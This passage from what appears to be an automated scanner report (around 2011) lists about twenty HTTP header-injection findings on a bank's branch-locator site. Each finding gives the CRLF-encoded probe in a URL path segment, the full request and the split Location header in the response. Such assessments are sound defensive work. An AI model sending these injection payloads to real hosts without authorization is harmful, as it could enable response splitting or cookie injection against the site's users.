Path:   /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 2b548%0d%0ae10ce7087df was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/2b548%0d%0ae10ce7087df/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:18 GMT
Server: Apache
Set-Cookie: JSESSIONID=99725C7C408C334DA1B7D471A13FCC7A.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/2b548
e10ce7087df/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.74. http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload fbba6%0d%0ab67a9c43677 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/fbba6%0d%0ab67a9c43677/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:18 GMT
Server: Apache
Set-Cookie: JSESSIONID=C51307DF41247B164799B1BB3BB33705.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/fbba6
b67a9c43677/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.75. http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 4b2eb%0d%0af2de8296906 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/4b2eb%0d%0af2de8296906=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:18 GMT
Server: Apache
Set-Cookie: JSESSIONID=EE3A6A7C8E8E8A7D4C12E5C159A85222.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/4b2eb
f2de8296906=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.76. http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3ee1e%0d%0a3c1650998ff was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/3ee1e%0d%0a3c1650998ff/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:40 GMT
Server: Apache
Set-Cookie: JSESSIONID=10126C4B65ECD43BE4F60AB8426A3E4C.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/3ee1e
3c1650998ff/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.77. http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 89c99%0d%0a158f9505b5f was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/89c99%0d%0a158f9505b5f/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=0D0A797FA89E9C73CAF79200904F7815.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/89c99
158f9505b5f/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.78. http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5e04e%0d%0aea88acdd9b6 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/5e04e%0d%0aea88acdd9b6/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=66DBE53A5E31BD1E2D0F542B594B32A7.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/5e04e
ea88acdd9b6/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.79. http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 42d0d%0d%0a4a07f88da73 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/42d0d%0d%0a4a07f88da73/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=D38D5960149EF29110EFEF6B77FB33FF.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/42d0d
4a07f88da73/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.80. http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 77217%0d%0a7d429af5ac5 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/77217%0d%0a7d429af5ac5=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=E5F25B03D5182732D6A7CCF7076F5D45.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/77217
7d429af5ac5=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.81. http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 96ffd%0d%0a518f143a5e1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/96ffd%0d%0a518f143a5e1/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=C6327366A8D89A36A9F0F73A8E4D21BF.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/96ffd
518f143a5e1/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.82. http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3aa47%0d%0a1f56f938d45 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/3aa47%0d%0a1f56f938d45/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=950EDC73F7E0C615521422BAC32FD089.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/3aa47
1f56f938d45/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.83. http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 53243%0d%0aa5a3c410205 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/53243%0d%0aa5a3c410205/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:40 GMT
Server: Apache
Set-Cookie: JSESSIONID=C227EBDAFB9E876E22307FAB819FCCA7.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/53243
a5a3c410205/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.84. http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3733f%0d%0a9194829c4a5 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/3733f%0d%0a9194829c4a5/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:30 GMT
Server: Apache
Set-Cookie: JSESSIONID=265BD093596A4A25C01B5256C6A7ED14.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/3733f
9194829c4a5/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.85. http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 165a6%0d%0aa901c64d070 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/165a6%0d%0aa901c64d070=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=07711330D508AC9FADAE5D55314CFDD5.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/165a6
a901c64d070=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.86. http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 9e89e%0d%0a2779423f158 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/9e89e%0d%0a2779423f158/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:40 GMT
Server: Apache
Set-Cookie: JSESSIONID=BC2A019072A392C782E75FF8FCE44778.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/9e89e
2779423f158/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.87. http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload b7b86%0d%0ae9f21ebc401 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/b7b86%0d%0ae9f21ebc401/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=A55A175CBF7F8F4C2C668732E1E3D3DE.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/b7b86
e9f21ebc401/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.88. http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload baeb5%0d%0a1baf85394c3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/baeb5%0d%0a1baf85394c3/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:25 GMT
Server: Apache
Set-Cookie: JSESSIONID=F4A08E0BA2ED9A28AE665A195926CBCC.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/baeb5
1baf85394c3/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.89. http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload cf8ce%0d%0a2cd18d76414 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/cf8ce%0d%0a2cd18d76414/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=9E612094D551B038D706565BDA21A91F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/cf8ce
2cd18d76414/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.90. http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload bc412%0d%0a1abce7d5f05 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/bc412%0d%0a1abce7d5f05=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:17 GMT
Server: Apache
Set-Cookie: JSESSIONID=EAD7CB94589B8D48FF52283E31E4676B.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/bc412
1abce7d5f05=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.91. http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b5e65%0d%0a675c77f48f8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/b5e65%0d%0a675c77f48f8/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:39 GMT
Server: Apache
Set-Cookie: JSESSIONID=DEC191786D810F7D21CDA69EB68448B8.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/b5e65
675c77f48f8/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.92. http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload c0fbe%0d%0ab8f970a494c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/c0fbe%0d%0ab8f970a494c/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:12 GMT
Server: Apache
Set-Cookie: JSESSIONID=3CD5E547D0E5DDEDC430F46EA82D5872.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/c0fbe
b8f970a494c/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.93. http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d7f98%0d%0aa21b1ed9aa1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/d7f98%0d%0aa21b1ed9aa1/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=578F3FA67D85850A95939C886D06505B.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/d7f98
a21b1ed9aa1/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
